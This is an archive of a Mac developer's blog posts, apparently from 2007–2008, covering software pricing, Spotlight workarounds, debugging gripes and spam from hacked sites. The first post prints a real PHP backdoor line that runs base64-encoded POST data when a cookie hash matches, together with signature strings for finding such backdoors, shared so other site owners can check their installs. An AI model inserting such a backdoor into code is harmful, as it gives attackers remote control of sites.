Website was Down Due to Compromised WordPress System

4 05 2008

If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])==”5fd808ac028e5197dd69318e32407eb7″){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as “qwerty”, “4008deadb16536f48b84fdc70f194dac”, “find suid files”, “_wp_debugger”, “5fd808ac028e5197dd69318e32407eb7″. The signatures are sure to change, as they’re used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.



An Urgent Mori 1.6.10 Release To Correct Bugs, and Workaround Spotlight Flaws

27 02 2008

While making the changes to Mori’s code for 1.7, I encountered some oddities in test results, and it turned out there was a bug which I had introduced in an earlier release. While it doesn’t appear to endanger data in Mori notebooks, it might not return all the results you expect in a search, or in entry summaries.

In addition, it has what I hope are a couple of performance improvements, continued improvements to Italian localization, and a work-around for Leopard’s insistence to treat non-Apple Spotlight metadata files as third-class citizens.

Normally when Spotlight discovers a file has been created or changed, it will ask the responsible program to figure out what’s inside, and feed it back to Spotlight. But one of the drawbacks to Spotlight’s design is it lacks the ability to define containers, or documents which contain logically distinct elements such as the chapters of a book, pictures in a photo album, or entries from a Mori notebook; and which can nest other containers as well. Treating a document as a single entity, Spotlight will open a document at the beginning (or maybe the place where the cursor was the last time it was open), even if what you’re looking for is somewhere near the end.

Because it doesn’t understand that a file can have distinct elements, the development teams for other Apple software (e.g., iPhoto, Safari, Stickies, etc.) came up with a scheme to trick Spotlight by creating new files with the data for those elements. So that’s how Jesse coded Mori’s behavior: duplicate the data for that logically distinct element in its own file. A separate copy of each element’s data in its own file. One extra file per element. That means the space taken up by your data is easily half again more than if Apple just added a container definition for Spotlight metadata (once for the notebook, another for the entry metadata file, and the third copy in Spotlight’s database).

But that isn’t all. While we’d like to keep all those extra files inside a notebook bundle (a directory which Finder treats as a file), because Spotlight treats a document as a single element it won’t look for those files inside the bundle. So Mori creates those files in the metadata cache folder (in your Library/Caches/Metadata folder), along with the metadata files from some of Apple’s programs. If you open the metadata folder and look at these files, you’ll see they have numbers to help Mori figure out which entry contains that data. But when you do a search using the Spotlight menu, and when you select menu item ‘Show All’ and the results are displayed in the Finder, you won’t see the numbers; you’ll see the titles for the entries they represent.

Leopard however, isn’t so democratic; which is why users where complaining about the entries when Leopard was released. First off, it ignores any non-Apple metadata files in the cache folder unless you set your Spotlight preferences to use those files. Secondly, it will ignore the title info embedded in the entry metadata file and just display the file’s actual title, meaning the number. How’s that for Apple undermining the work of third-party developers?

So the workaround I came up with is to add the entry’s title (or Untitled, if it has none) at the beginning of the filename, so you at least have an idea which entry matches your search terms.

Spotlight Filename Workaround (Thanks for wasting about a whole month total of my development time on that alone, Apple. I feel the love.)

I am, of course, more than happy to eat crow should I be proven to be completely mistaken or speaking from out-dated information. It’s easily worth it in order to improve the user experience.

Regardless of the rationale for the design decisions, enjoy, and thank you for being part of the community and continuing to support Mori!



Now That It’s Winter, Developers Should Develop Some Thick Skins

13 12 2007

How timely! I had been working on the last entry for nearly a week, and was giving the 8th or 9th proofing when Manton Reece tweeted, “Finding the comments on CandyBar upgrade pricing kind of interesting. http://tinyurl.com/26aggr“.

That’s happened quite a bit lately, as I’m a bit of a perfectionist and entries I’ve began have been bogged down in my proofing stage. At least I was able to finish and publish the entry when those comments began. I guess I’ll have to do less polishing and just more shoot from the hip, dangerous though that may be for a corporation; and likely to result in a retraction or two in the future.

But it’s precisely those retractions and changes in policies and reactions to public opinion that developers should learn to handle. Most just don’t like having to say no. Well, most people don’t like to say no. But it’s important to know to say no, as you don’t have time to do everything you want, and you have to learn to prioritize based on what’s important to you.

Here are a few of those interesting comments left for that article:

I bought CandyBar 1 & 2. I won’t be paying Panic for 3, they priced it outside of my impulse range by trying to make it into more than it needed to be. I’m sure it was a lot of work, but that upgrade price is just too much for some icon swapping.
– Aurich

Another $5 product priced at $25.

Sounds like a job for serial box!
– Greasy Breakfast

There’s always LiteIcon. Not nearly as pretty and doesn’t do the dock trick — but it’s free.
– Insomnic

And that’s the point: if you want more functionality, expect to have to pay more for it. If you don’t want to pay for it, settle for less or do without. You’re not obligated to work overtime on your day off so your company can make more money off you, nor are companies obligated to lower their prices just so you can afford to buy their products.

quote:
Why are some people so against paying for something that had a lot of work put into it?
Because it doesn’t DO very much! If I put a lot of work into taking a dump are you going to pay me for it? What if I were to wrap it in shiny plastic? Would you pay me then? CandyBar is about 99% interface and 1% function. The point is that what this program actually does is largely unspectacular and is available for free by other means regardless of how much work was put into it to make it look nice.
– Fiendish

Schools used to teach that things could be separated into wants and needs, but back then parents used to take responsibility for their kids’ education. A Lexus is no more effective, yet is far more expensive, than a Kia for driving from one place to another. A Ferrari even more so. Not everyone wants or can afford the more expensive vehicles, yet they sell very well. A man has to pick the standard of living he’s content with.

If you’re running a business, the most important thing has to be the money (or some reasonable substitute). Some people like to espouse terms like ethics and morality and customer service, but those aren’t requirements for running a business. Those are principles by which you make decisions for how to run a business. And making decisions with those principles can make for a healthier business in the long run. But they aren’t necessary for a business. An unprincipled business that is profitable will outlast a principled business that isn’t.

People are afraid of money. People don’t want to be greedy, or worse, don’t want to be seen as greedy. Most people have a dysfunctional gauge for money which varies wildly depending on its context and is completely disproportionate to its true purpose. Money is just a product, made by man, used to trade goods and services. It is a way to shift one asset you have to another. Like your health and time or a house or car, money is just another resource that you can manipulate and assign a value to. Money doesn’t exist or accomplish anything on its own.

From a moralistic point of view, money lacks any. It is neither good nor bad. Even the saying “Money is the root of all evil” is a misreading of text from the Bible, which doesn’t condemn money. The actual text is, “For the love of money is the root of all evil: which while some coveted after, they have erred from the faith…,” and you don’t have to have a dollar to your name to covet. You don’t need a dime. In fact, a great many people in the world who criticize those who work hard to achieve financial success are also out there buying lottery tickets every week. Is money attained hastily in a desperate attempt to improve your life better than money gained after working a lifetime, or inherited?

You should think of your role in business as a farmer, looking for a harvestable crop. Disregard what you’ve heard about money not growing on trees. Everything grows. It’s a universal truth. You just need to recognize what the tree is for a business: its relationship with its customer. Now you can’t just have any customer and expect to harvest cash from him. Just like expecting walnuts from an apple tree, there are customers that don’t produce money for you because they aren’t the right tree for your business. And even the right tree requires the right soil conditions, the right amount of sunlight and the right amount of water. If you don’t have the right environment for the tree, pick another tree or you’ll waste a lot of your time and effort and trees.

But some trees are unhealthy. Some trees won’t bear fruit no matter how well you nourish them. Letting yourself be cheated of your hard work is just as bad for business as cheating your customers. There has to be a balance which is healthy for both parties in the relationship.

Now there may be a lot of customers who cannot afford your product, who will have to go without, or resort to unethical behavior to obtain it. But the same is true for your business, it cannot afford to buy everything to maximize its efficiency. You have to compensate and adapt and act based on your abilities.

But if you can’t refuse to take work which isn’t profitable your business won’t be profitable. And if your business can’t be profitable it can’t survive (unless its main purpose is to be a tax write-off!).

Uproot the wrong trees so they can be replanted in the proper environment, and plant the right trees. You’ll be able to take better care of them, and the remaining trees will be better off as well.

So this winter, do the right thing by your business and your customers: learn to turn away customers which are unhealthy for your business so you can take better care of the ones who aren’t.



Mori, PIMs, Pricing and the Business of Software (Was Re: Mac PIMs in General (was NightHawk)

12 12 2007

A few days ago, there was a thread on the Macintosh PIMs group that descended into a diatribe against the current state of PIM software and the cost of software. In response, I wrote what turned into a very long, poorly-conceived, and most likely ill-advised response to some of the opinions voiced. Very few quotes are enclosed, as it’s mainly a response, not a rebuttal.

Please forgive what is sure to be a foolish action on my part, but nothing concerning the current state of affairs will improve by actively avoiding public discussion of the issues. None of my comments are an attack on the people whose comments I responded to, particularly db whom I responded to especially. Consider his remarks a proxy for a lot of the “it costs too much” complaints I see on sites like VersionTracker, MacUpdate, iusethis, and elsewhere on the Internet. And it’s with the intent to publically respond to those complaints that I choose to do so here, rather than the Macintosh PIM group’s mailing list. My apologies to the Mac PIMs group, and the rest of the netizens (although there are worse things one should unsee). With that in mind, here is Apokalypse’ contribution to the conversation. Your comments are welcome.

Ted Goranson wrote [Context added so his position is somewhat clearer. His remarks are included as Mori is mentioned. -- AG]
> the value added. Users who know nothing about development somehow
> expect the same, unreasonably low pricing scheme.
>
> These people, for example are why we don’t have Incontrol and
> Infodepot, why we lost MORE. Why Mori was all but lost.

db wrote:
> I’m going to try again (to change this topic ;-)
>
> Ted/Edward,
>
> I appreciate the understanding and constructive disagreement, however
> large or small, though actually I don’t think we really disagree about
> anything substantial, other than pigs flying. I have proof, from the
> state of Maine no less, which is the original home state of Mori and
> still the home of Mori’s original Developer, HogBay Software:
> http://sendbread.com/
>
> Mori got smart and moved to Florida, well before winter set in. I have
> no idea where the pigs went.

db wrote:

> And you expect Mori to get
> it right with a part-time developer.

Since there’s been some mention made of Mori of late, I believe it’s in the community’s best interest for me to stir things up a tad bit more in the hope that by sharing my experience as Mori’s owner/developer, a better understanding of the current state of the Mac software market might help to improve the situation for us as users and businesses.

And I know, db, that you like to constantly talk about Mori’s “original” developer, in a wistful (or rueful) tone, but the truth is Jesse wasn’t developing Mori when I purchased it from him, had lost all interest in continuing development months before, and never wants to touch Mori code again. This isn’t an attempt to be cruel, but to make the point with finality. If anyone has any bugs to report or feature requests they want to make, they’ll have to tell me. I’m the only one who’s responsible for the condition it’s in now, and the only one who’ll be able to make the necessary changes. I’m the one taking Mori into the future. Or to put it into less delicate terms, Mori may once have been Jesse’s little girl, but I’m making her a woman.

The Low-Baller Wins Myth

> There are some folks who will defend M$ pricing, or the price of an
> unlocked iPhone in Germany. That’s OK, but not me.

> If you recall, I am asking for a more modest personal edition price,
> to help the product succeed by increasing market penetration (and
> frankly, user goodwill) in order to make an integrated PIM available
> to more users. I’ll bet that your Mac and it’s apps save you $1000s
> more than they cost if you use them effectively in a work environment.
> But if Apple sold them at a price that more closely approached the
> savings gained by it’s users, users would have revolted and there
> would be no Macs. The Apple IIe saved me a ton of time in college but
> that doesn’t mean I would have been willing or able to pay two or
> three times as much for that option. My strategy is to charge as
> little as I reasonably need to and I’ll keep busy. If some fool wants
> to pay someone more thinking they must be getting a something better.
> Fine. I don’t like working for fools anyway.

> I think their is a marketing possibility that more at lower pricing
> will offset less at higher. Not everyone is a fool.

The problem with your strategy is it fails to account for shortfalls in sales volumes, changes in the market, and other unforeseen events; both corporate and personal. For a lower price to make a difference it has to be substantially lower, and for volume to make up the loss in margin it has to be several times higher. Selling 25% more of a half-off product won’t cut it. And when your target market is the price-conscious, economic conditions which impact their budget also impacts your sales. Wal-mart successfully, though unintentially, demonstrated that for us these past two years.

People spend 50-300% more for an Apple iPod than for anyone else’s portable media player. Not just 20-30%, but up to 300%! That’s two to three times more for a device to play songs or display pictures. The multiple is even higher when you consider the features lacking in an iPod which are available in other players. So you think iPod buyers are fools. I think your opinion that price is the main consideration for consumers is faulty. Or is there some special excuse we give Apple for pricing above the market, instead of “a more modest personal edition price”? (The iPod Shuffle furthers my argument, not yours, as the Shuffle is priced against Apple’s own products, not the rest of the market: it is has even less features.)

When you made that crack about me developing Mori part-time, I was insulted. But then I realized that, in all honesty, I am only developing Mori part-time. I’m also handling web-site duties part-time, which include controlling spam, updating the site software, touching up the databases, writing blog entries, performing backups, and preparing traffic reports. I’m also fielding customer support, whether it’s email, IMs, the fora, or bug/feature tracking. I’m also handling marketing, which includes contacting blog writers, contacting writers and editors in the media, preparing market plans, product literature, artwork, etc. I’m also writing user docs, screencast scripts, tutorials, and the like, in several languages. I might be doing all this, but my development work on Mori itself is, as you say, strictly part-time.

Most software developers in the Mac market are small shops. MicroISVs. Indies. Whatever the term, sometimes it’s a shop of two or three people doing product development. By far, though, the bulk of the product developers today are one-man shops. Somebody working solo. And that solo developer typically doesn’t make enough to support himself on his products’ sales. It usually doesn’t matter because these indies are usually students or employees of another company. Their product is just something they whipped up for their own needs or interests, and they decided to offer it for sale to make a few bucks (just like the Apple story we’re all so fond of).

However, I’m neither a college student nor employed anywhere else. I’ve even turned away contracting offers due to the backlog of development tasks. So I have to question what your beliefs are when I read your crack about my work on Mori as nothing more than part-time in the same paragraph where you complain that Mac software is overpriced, and how small shops can’t afford market research!

A Cowboy [Coder] Isn’t A Landowner

> I think many (not all) of the little one-man shops fail because they
> lack the willingness or ability to see or use the advantages of
> cooperation with others. They sometime simply want to be in charge,
> their own boss, and see cooperation, of course, as giving up control.
> That’s the way it is when you work with others. Unless they have such
> a big hit that allows them to hire others, they’d be far better off
> cooperating with others. Look how many GTD and info management apps we
> have from very small shops. Few have a chance at decent success
> working alone, and especially when competing with the larger shops
> which simply engender more consumer confidence because of their size,
> never mind having more resources to begin with.

Now you’re finally saying things I can almost completely agree with: most indies want to strike out on their own so they can be their own boss. The problem is most lack the chops to do it. Being intelligent in one field, many assume they know what it takes to be successful running a venture entirely on their own. Being socially awkward, many are too untrusting of others to risk venturing with them. Indeed, many realize the likelihood is that any new venture will go belly up in less than five years. Though most entrepreneurs fear personality clashes with potential partners, the most common cause of failure is insufficient resources.

What incentive does one developer have to cooperate with another? to give his source code and a promise to share profits with a competitor? I’ve repeatedly attempted to persuade other developers to work with me, but loved as I am for my winning personality and disarming smile, I’ve been unable to convince them to abandon their products and support mine instead! Crazy, no? Perhaps they need some sort of compensation for their investment in their product and their customers; some security or other evidence of the legitimacy of the deal, and its probability of success. Would having a bankroll improve the likelihood of him joining me so that we “have a chance at decent success”? How do I accumulate this bankroll with your strategy “to charge as little as I reasonably need to and I’ll keep busy”? While being a low-price leader may be a marketing strategy, volume isn’t proof of commercial success. Long-term commercial success is dependent on your money being busier than you.

There are a couple of your comments that undermine your entire “more modest personal edition price, to help the product succeed by increasing market penetration” fallacy. One is, “Unless they have such a big hit…” Unless? So you admit the chance of that happening is slim. And if the chances of having a big hit and the volume that it creates are slim, then prices will have to remain high to stay in business. Also, if you think having a low price will guarantee a big hit, you are guaranteed that a competitor will come along and undermine your sole competitive advantage with an even lower price.

The other comment debunking your assertion is, “…larger shops which simply engender more consumer confidence because of their size, never mind having more resources to begin with.” Without the margins and volume to build up your resources, how do you expect to engender more confidence in consumers?

If you don’t make enough profit with the early adopters of your program, you’ll never last long enough to develop the additional features, user resources, documentation, etc. to be purchased by the mainstream. In addition, your organization will likely implode due to an inability to adequately provide service for your customers.

You probably have a larger selection of PIMs to choose from now than ever before, so why aren’t you satisfied? It’s because they aren’t as powerful or feature-rich as the old ones were. You’d say they lack the quality, or aren’t of the same caliber as the old apps. I’m pointing out that, twenty years later, the apps are substantially less expensive as well; and they don’t get better because the developers can’t afford to invest more development time and money in them!

Road Closed Due to Growth

Do you know what it takes to add that power and those features you long for to the software on the market? It doesn’t take listening to the customer, because customers have been talking about their needs for years. It doesn’t take writing better docs, which people don’t like to read anyway. It doesn’t take promotional discounts or educational versions, which have a limited lifespan in effective marketing.

It takes engineers. Software engineers and time. Time to think about how the current product was architected. Time to think about what features need to be added. Time to think about what features can be added given the current state of the product. Time to design the code to add those features to the product. Time to code the features into the product. Time to test the code. Time to fix the code. Time to redo the steps again and again until it’s ready to be released. Or worse, until they run out of time.

Do you think engineers are given special treatment for all this wonderful code they’re adding? Do real estate developers or hotels put a roof over their head because they’re improving products? Are hospital visits, medical treatment, or even health insurance without a price because we’re indispensable? Do engineers get any food or caffeine of any quantity without charge because of their role in society? Or should they be required to sacrifice their own needs and wants for transportation, entertainment, family, etc. to fulfill some “higher calling”?

Someone who enters the PIM market as a business isn’t looking to scrape enough money to buy himself a shiny new MBP for Xmas. There’s more than just the cost to purchase equipment. Or pay electric bills. Or Internet access. Or to purchase technical books and journals. A business can’t just make enough to cover the salaries of its employees, its legal fees, its taxes, etc. It has to cover the cost to invest in growth: of its products, its corporate infrastructure, and its owners.

Someone has to foot the bill for all these things while time is being spent adding those improvements you want so much, whether it’s a VC, an angel investor, a spouse, family, friends, whatever; and that someone is going to want a return on their investment. You get a lot of turnover in this industry because these would-be entrepreneurs discover the return on their investment just isn’t satisfactory.

A competent software engineer can make at least $75K/year, even as a fresh graduate. For a 2080 hour year, your product has to bring in $36.06 per hour to cover his salary. His salary alone. If you don’t want him to work on development part-time, like I do, you have to pay others to do the marketing, technical writing, artwork, administering servers and websites, the business-administration-type stuff, etc. So, say you as the business owner make a worst-case salary of $80K, and your developer makes $75K per year. So after other operating expenses of $65K, and a 20% profit for the year, a business should bring in $264K. That is for strictly online sales without a marketing program. It excludes marketing expenses such as advertising, sales commissions, packaging, product literature, trade show exhibitions, etc.

That’s $129.513/hr in sales for a company to be comfortably profitable. (Oh, did we forget to deduct the processing fees deducted from sales by the payment processing firm? You can go out of business if you forget these details!) If we don’t make that, there isn’t a point pretending we run a business. And if you don’t have a business standing behind the software you use to manage your information, quit pretending to be surprised when it’s no longer under development, being supported, or that the features you enjoyed on the old packages will ever return in anything new.

Companies are bought and sold. So are product lines. Products with a sufficient revenue stream continue in the market, regardless of their origin. Products that aren’t worth the trouble die; regardless of how loved they were and how missed they’ll be. So if you’re not prepared to spend the money necessary to obtain a solid, powerful package now, then let time take its course. The part-time developer you’re supporting will either get the features added in there eventually, or drop the product for something more rewarding in his life.

Those who cannot learn from PIM history are doomed to re-key their data

Let me explain why there isn’t a strong third-party PIM in the Mac market. Future product development is based on past product development. Whether it’s the profits from past products, or using the codebase of previously engineered products (e.g., Cocoa and Carbon), one product is built upon others. And whenever someone gets the bright idea to write another to-do list or contact manager or agenda application, whether it’s to learn how to develop for the Mac, or because they have more time than money, they have to develop the basic functionality first. Then, they think, “This is so helpful for me, I bet other people can use it too,” so they make it available to others as freeware or shareware, presumably to others who perceive a similar lack in existing apps or possessing a similar lack of funds.

Then, his app begins to find users. Slowly, of course, because it’s new and the majority of people will let others be the early-adopters. But his app will find some users because it sufficiently meets their feature/price requirements. But! its feature set is shallow because he started from scratch. And! there are a few bugs here and there that need to be fixed. And! it doesn’t sync with Apple’s bundled PIMs. And! it lacks support for their phone or pda. He doesn’t have time to add innovative features because he’s too busy trying to catch up. Now it stops being just a hobby and starts to be real work. Then he thinks, I’ve got to get something more out of it. If he feels he can do it, he’ll start charging (more) for it.

Now there are people who don’t mind spending hours in front of a TV set, playing video games, or downloading and reading stuff off the Internet. It’s something to occupy their time. A way to unwind. Maybe someone likes to tinker with cars, spending months to strip down a junked Mustang and rebuild it into a street monster. It’s a nice way for him to while away the days. Perhaps when he’s finished he’ll just cruise the strip in it. Maybe he’ll street race. Maybe he’ll sell it off and use some of the money to buy another clunker and start over again.

Regardless of the number of times he rebuilds cars for fun, his mindset changes when he begins to treat it as more than just a hobby. His goals will be different. The decisions he makes will take on a whole new importance, and even the tools and processes he uses will have changed.

It’s the same way with software development: you can afford to waste time and money on it when it’s just for kicks. But when it competes with the rest of your life, when a child becomes ill, your spouse loses a job, or your kids are in college, those things that occupied your time are re-evaluated; and you decide whether or not it needs to be treated more seriously, and how committed you are to its success.

And businesses that were profitable in this market re-evaluate their returns due to the competition. They consider whether branching out to other product lines or other platforms will be more rewarding. Developers, large and small, let sales coast without active development. Eventually, their products are outdated, or the platform is (like Mac OS 9 or Tiger). Then some developer decides there’s no to-do list or contact manager or agenda app that matches his feature/price requirements, so he writes one from scratch…

And that is why the PIM market, indeed, the Mac software market in general, is so poor today, and only a few categories have clear market leaders.

As far as PIM goes, it’s obviously an inadequate term for the types of products that fit in that category. There are calendars, to-do lists, project planners, address books, outliners, and on and on, but Mori is specifically a digital notebook app. And while users and developers can add agenda, contact management, GTD, file management or even wordprocessing and spreadsheet functionality through the use of scripts and plug-ins, it doesn’t come with the features typical of those applications. In fact, a lot of the design work I’ve been doing over the past couple of months has been to reduce the excess behavior in Mori and recast its feature set with an eye towards note taking and organizing superiority. Any additional behaviors will have to be the result of plugins. This means the plugin API will be more sophisticated though.

The point is, I’m not going to add features to Mori to handle all PIM needs. And I’m not going to cater to the notetaking needs of every Mac owner out there. Apokalypse will be focusing on the professionals who understand the value of their time, and demand software that delivers productivity gains that make them look good. SOHO users. It isn’t that I don’t appreciate everyone else, but I can’t afford to help everyone else, and the quality of the products will suffer badly. This is one reason why I’ve continued Jesse’s practice of sending prospects to other products, you can’t be all things to all people.

So, as a user of PIM products, figure out what your needs are. If you’re just looking to keep a list of your friends and family members’ contact info, track class activities or have the occasional sticky, the iApps bundled with the Mac should be enough. If your needs are more sophisticated and your time is a resource you use to produce money, find the software that will maximize your productive use of time in managing your tasks, contacts, info, etc. and purchase it. Even at minimum wage rates, you should recoup your investment within the first week!

If you want engineers and small businesses in general, and me in particular, to improve the quality of your life, you’re going to have to improve the quality of mine. How can we maintain a continuing relationship otherwise?



A Week of Fist Shaking at BOFH and Open Source Developers

6 12 2007

The past week was one of the worst in recent computer experiences I’ve had, surpassing the Leopard install. In fact, the last time my experience has been this bad was when I last fiddled with website software. I was going to abandon the whole server transfer/upgrade plan due to the issues the upgrades were causing, but I remembered the transfer itself should be fairly trouble free. I’ll only upgrade a minor version; not a whole version, which would require adding a lot of code to custom modules Jesse wrote. Should be.

I can appreciate the time and effort invested by those who work on open source projects, but developers who complain that users aren’t migrating to their latest efforts quickly enough are both arrogant and naive. Customers prefer to be able to continue using the data they’ve stored in the current versions to losing them when they migrate to the newer ones. I’m pretty sure it’s the same for OSS users. Much as I love writing code, I have enough to write already thank you very much. And I don’t appreciate having to spelunk through your code to figure out what those data structures you’ve added are supposed to do (”ooh, shiny, new!”) just because you’re too lazy to write the docs (”the code are the docs!”) and impatient to play with your new ideas.

Although the site I inherited from Jesse used a CMS system distinct and incompatible from the one I had selected when I started my own, I didn’t want to switch it around or try doing new things with it because I felt the continuity was better than taking the time to rebuild a site from scratch. But now I can appreciate Jesse’s decision to do such a thing. If I have to spend the downtime upgrading parts that already work well just to get the features needed for other modules, I might as well fix it to my own needs and ignore the chaos that OSS developers are creating in the system. Now the whole NIH question is thrown out the window. It’s no longer a matter of, “Oh, I can do a cooler system.” Now it’s a question of the developers themselves causing users to abandon their system. A question of distrust and self-preservation.

Hopefully, any remaining misconfigurations in the website will be rectified before a second person notices it.

If you sent an email in the past 24 hours (of 2007-12-05) and you haven’t gotten a response already I apologize, but you’ll need to resend it. My site host doesn’t transfer files, emails, settings, or the like between accounts; and well, it has probably been crushed by the lumbering floes. In fact, if you’re waiting for a response from me on any matter, please jog my memory with another email.

Anyway, at least the site now has some breathing room, and I can continue improving the products.



Late Night Cruisin’

15 11 2007

Ever since I decided to treat my blog more like Twitter, and just write micro-events rather than an entire epistle, writing either has come to a virtual standstill. (Except of course for the firestorm that has been Mori v1.6.4, v.1.6.5, and v.1.6.6 which is now undergoing 3rd party testing and I’m still trying to squash that “freezes while writing in Leopard” bug.)

Option-clicking the ‘Run’ icon in Xcode3 causes Mori to execute, then gdb starts up and attaches to Mori’s process, then Mori quits. Huh?

As if that weren’t enough, everytime gdb starts up, it spews out a lot of warnings about object files it can’t find. Like so,

warning: Could not find object file “/BinaryCache/Libsystem/Libsystem-111~176/Root/usr/local/lib/system/libc_debug.a(errno.o)” - no debug information available for “/SourceCache/Libc/Libc-498/sys/errno.c”.

warning: Could not find object file “/usr/local/lib/system/libcommonCrypto_debug.a(md2_dgst.o)” - no debug information available for “/SourceCache/CommonCrypto/CommonCrypto-32207/Source/Digest/md2_dgst.c”.

warning: Could not find object file “/usr/local/lib/system/libcommonCrypto_debug.a(md4_dgst.o)” - no debug information available for “/SourceCache/CommonCrypto/CommonCrypto-32207/Source/Digest/md4_dgst.c”.

warning: Could not find object file “/usr/local/lib/system/libcommonCrypto_debug.a(md5_dgst.o)” - no debug information available for “/SourceCache/CommonCrypto/CommonCrypto-32207/Source/Digest/md5_dgst.c”.

warning: Could not find object file “/usr/local/lib/system/libinfo_debug.a(gethnamaddr.o)” - no debug information available for “gethnamaddr.c”.

warning: Could not find object file “/var/tmp/Libm/Libm-287.1~6/Libm.build/Libm_debug.a.build/Objects-normal/ppc/scalb.o” - no debug information available for “/SourceCache/Libm/Libm-287.1/Source/PowerPC/scalb.c”.

What kind of railroad are we running here?

Anyway, at this point I’m planning on changing the file format after v1.7 ships. It’s just making it too tough to do some fixes. Mori still won’t require Leopard for some time yet, but I have to make my job, and putting out updates, somewhat simpler.



MIT Media Lab Server Latest to Be Hacked And Submitted For Comment Spam

23 09 2007

UPDATE: Thankfully, the MIT Media Lab’s Vision & Modeling Group’s server has taken down the hacked pages. When will the rest of these websites do the right thing?

One of the burdens of being an international software mogul is the comment spammers that attempt to pollute my brilliant commentary with their garbage.

I can deal with the fact that there are vampires out there that prey on the weakness and absent-mindedness of others. But shouldn’t the folks running MIT be smart enough to secure their own servers? Like, perform some rudimentary check for exploitable devices and compromised systems?

Since I won’t link directly to the pages the comment spammer wanted to place in a comment to my blog, You’ll have to figure out how to go directly to this page yourself: http://vismod.media.mit.edu at page /people/health/bakhtear/@top/viagra/order-viagra.html. If you do a search on the text following the @, you’ll see a few other sites hacked by this ass.

While Geoff Pado and I were inspecting the exotic URL and attempting to decipher how the strange ‘@’ would be processed by a server, and which server was actually responsible for this monstrosity, Gus Mueller used curl to determine it was actually stored on The MIT Media Lab’s server for the defunct Vision and Modeling group.

Other hacked websites whose URLs have been posted on my site:

http://www.gatlinburgeducation.org at page /custom/css/
http://www.silvergalleon.com at page /custom/css/
http://www.hayloftonline.com at page /custom/css/
http://www.vinosbrewpub.com at page /buy_ats/Client_carts/css/
http://www.dhowardpottery.com at page /custom/css/
http://tecpapers.com at /css
http://www.sandboxsoftware.com at page /new/css/
http://www.dallasavionics.com at page /tkm/css/
http://ukindustrialtapes.co.uk at page /new/ice/
http://redstonemedia.com at page /invoice/icq/
http://kartingnortheast.com at page /e-news/new/
http://thequadruscentre.co.uk at page /pdf_files/pdf/
http://freemancateringbutchers.co.uk at page /images/gif/
http://aldg.co.uk at page at page /Connections/ip/
http://initialimages.co.uk at page /images/sr/
http://learntotile.co.uk at page /images/twu/
http://www.dupeyrou.ch at page /css/
http://weardock.co.uk at page /guestbook/res/
http://personalgiftsuk.co.uk at page /sanddancer/bat/
http://sq-one.co.uk at page /news/wqs/
http://advertisingready.com at page /css/
http://adsenseready.com at page /css/
http://asylum-gameservers.com at page /epass/card/
http://www.cerrone.net at page /txt/bin/
http://www.sthelenahospital.org at page /info/css/

I’ve not provided the markup to actually link to these sites so the search engines don’t think I’m linking to them, although they may actually follow the text in that case, and so I don’t get considered as an affiliate of these bozos.

Three other hacked sites that the perpatrators spammed me with have since taken down the offending pages. Let’s hope they’re more secure and that this helps to shame the laggards into shaping up. But seeing as how they haven’t corrected their lapses after my emails, I don’t think this will fare any better.



Fads, Trends and Memes

24 05 2007

Fads: lolcats, All Your Base Are Belong to Us, Star Wars Kid, fashions

Trends: Urban sprawl, dynamic languages, globalization/nationalism

Memes: Regional dialects, object-oriented programming, proverbs, calculus

Items move from the upper, more ephemeral, lists to lower ones over the course of time.

Oh, and it’s jibe, not jive. And quit using myself until you learn when to use it.



Here We Go Again

5 04 2007

Some bigmouth makes an ass of himself in public, and the whiners start crying about it.

He’s a shock jock, children! That’s how he gets attention. And when he gets attention he makes his advertisers happy.

You just made his job easier.

Thanks for nothing.